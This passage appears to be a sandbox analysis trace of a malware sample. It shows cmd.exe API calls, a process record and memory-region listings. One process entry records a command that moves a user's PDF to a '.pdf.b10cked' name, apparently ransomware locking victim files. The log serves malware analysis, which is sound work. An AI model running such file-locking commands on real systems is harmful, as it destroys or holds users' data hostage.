_get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.941] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.942] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.942] GetFileType (hFile=0x4c) returned 0x1 [0140.942] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.943] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] GetFileType (hFile=0x4c) returned 0x1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.943] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.943] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.944] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] GetFileType (hFile=0x4c) returned 0x1 [0140.944] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.944] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.945] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.945] GetFileType (hFile=0x4c) returned 0x1 [0140.945] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.946] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x32, lpOverlapped=0x0) returned 1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] GetFileType (hFile=0x4c) returned 0x1 [0140.946] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.946] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x32, lpOverlapped=0x0) returned 1 [0140.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.947] _close (_FileHandle=4) returned 0 [0140.947] FindNextFileW (in: hFindFile=0x480e78, lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0 [0140.947] GetLastError () returned 0x12 [0140.947] FindClose (in: hFindFile=0x480e78 | out: hFindFile=0x480e78) returned 1 [0140.947] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.948] _close (_FileHandle=3) returned 0 [0140.948] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.948] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.948] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.948] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.948] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.948] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.949] SetConsoleInputExeNameW () returned 0x1 [0140.949] GetConsoleOutputCP () returned 0x1b5 [0140.949] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.949] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.949] exit (_Code=0) Process: id = "169" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14852 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14853 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14854 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14855 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14856 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14857 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14858 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14859 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14860 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 14861 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15452 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15453 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 15454 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 15455 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15456 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15457 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15458 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15462 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15463 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15464 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 15465 start_va = 0x76490000 